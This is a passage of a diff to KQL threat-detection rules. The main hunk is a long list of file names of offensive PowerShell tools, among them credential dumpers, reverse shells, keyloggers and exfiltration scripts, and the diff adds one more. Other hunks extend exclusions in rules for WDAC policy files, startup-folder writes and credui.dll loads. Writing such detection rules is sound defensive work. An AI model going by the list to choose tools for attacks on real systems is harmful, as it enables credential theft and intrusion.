FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file +| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSExfiltrator.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql index ed2f4df5..3bd9a478 100644 --- a/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql +++ b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql @@ -9,4 +9,4 @@ // - Administrators and security vendors could leverage WDAC, apply additional filters as needed. DeviceFileEvents -| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System"))) \ No newline at end of file +| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe"))))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/startup_folder_file_write.kql b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql index 06004f00..e150e9e2 100644 --- a/KQL/rules/windows/file/file_event/startup_folder_file_write.kql +++ b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql @@ -9,4 +9,4 @@ // - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate DeviceFileEvents -| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk"))) \ No newline at end of file +| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\uus\\ARM64\\wuaucltcore.exe")) or (FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\" or FolderPath startswith "C:\\$WinREAgent\\Scratch\\Mount\\")))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql index dc4b3d89..8eb0fba6 100644 --- a/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql +++ b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql @@ -9,4 +9,4 @@ // - Other legitimate processes loading those DLLs in your environment. DeviceImageLoadEvents -| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file +| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SystemApps\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith 